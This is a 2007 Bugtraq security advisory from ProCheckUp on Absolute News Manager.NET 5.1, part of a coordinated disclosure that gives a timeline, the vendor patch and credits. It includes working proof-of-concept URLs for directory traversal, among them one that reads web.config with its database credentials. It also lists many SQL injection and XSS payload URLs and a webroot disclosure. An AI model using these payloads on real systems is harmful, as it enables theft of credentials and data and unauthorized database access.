[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: PR07-39: Multiple vulnerabilities on Absolute News Manager.NET
From: research () procheckup ! com
Date: 2007-12-04 14:20:36
Message-ID: 20071204142036.22514.qmail () securityfocus ! com
[Download RAW message or body]
PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file \
retrieval and SQL injection
Vulnerabilities found: 16 November 2007
Vendor informed: 19 November 2007
Vulnerability fixed: 28 November 2007
Severity: High
Description:
Multiple vulnerabilities were found on Absolute News Manager.NET 5.1:
- unauthenticated file retrieval (directory traversal) on '/pages/default.aspx'
- unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly \
'/pages/default.aspx'
- XSS on 'xlaabsolutenm.aspx' and '/pages/default.aspx'
- webroot disclosure on 'getpath.aspx'
File retrieval PoC:
The following URL shows the contents of .NET 'web.config' (contains DB credentials):
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=../web.config
The following URL show contents of the vulnerable script:
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=default.aspx%00
Note: in order to obtain the content of '.aspx' files, a null byte '%00' must be \
added after the filename.
Show content of other scripts:
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../default.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../PPL1HistoryTicker.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolutenm.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../streamconfig.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../articlefiles/r.asp%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
SQL injection PoCs:
Vulnerable script: /[CustomerDefinedDir]/xlaabsolutenm.aspx
Vulnerable parameters: z, pz, ord, sort
Requesting the following URL returns the version of Windows and SQL server:
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar \
value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 \
Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 \
(Build 3790: Service Pack 2) ' to data type int.
Other URLs:
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_PAYLOAD&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort=posted&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort=posted&
The script '/pages/default.aspx' might also be vulnerable to SQL injection but it has \
not been confirmed.
Requesting the following URLs:
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=40&z=9999999999999
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=9999999999999&z=1
return the following error:
System.Data.SqlClient.SqlException: Error converting data type nvarchar to int.
XSS PoCs:
Vulnerable script: '/xlaabsolutenm.aspx'
Unsanitized parameter: 'rmore'
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=articleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y
Vulnerable script: '/pages/default.aspx'
Unsanitized parameter: 'template'
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ealert(2)%3C/script%3E
Webroot PoC:
Requesting the 'getpath.aspx' demo script discloses the physical path of the webroot \
- ie:
http://target.tld/[CustomerDefinedDir]/getpath.aspx
"
Absolute News Manager Physical Path :
D:\inetpub\target.tld\[CustomerDefinedDir]\
Please delete this file from your installation.
"
Consequences:
Contents of any files on the web server can be obtained. Unauthorized SQL queries can \
be injected. Scripting code can be run within the security context of the target \
domain. Information about the target environment can be extracted.
Fix:
http://www.xigla.com/security/
http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip
Note: ProCheckUp has NOT tested the patch provided by Xigla Software.
References:
http://www.procheckup.com/Vulnerability_2007.php
http://www.xigla.com/absolutenmnet/
Credits: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd \
(www.procheckup.com)
ProCheckUp thanks Xigla Software for working with us.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic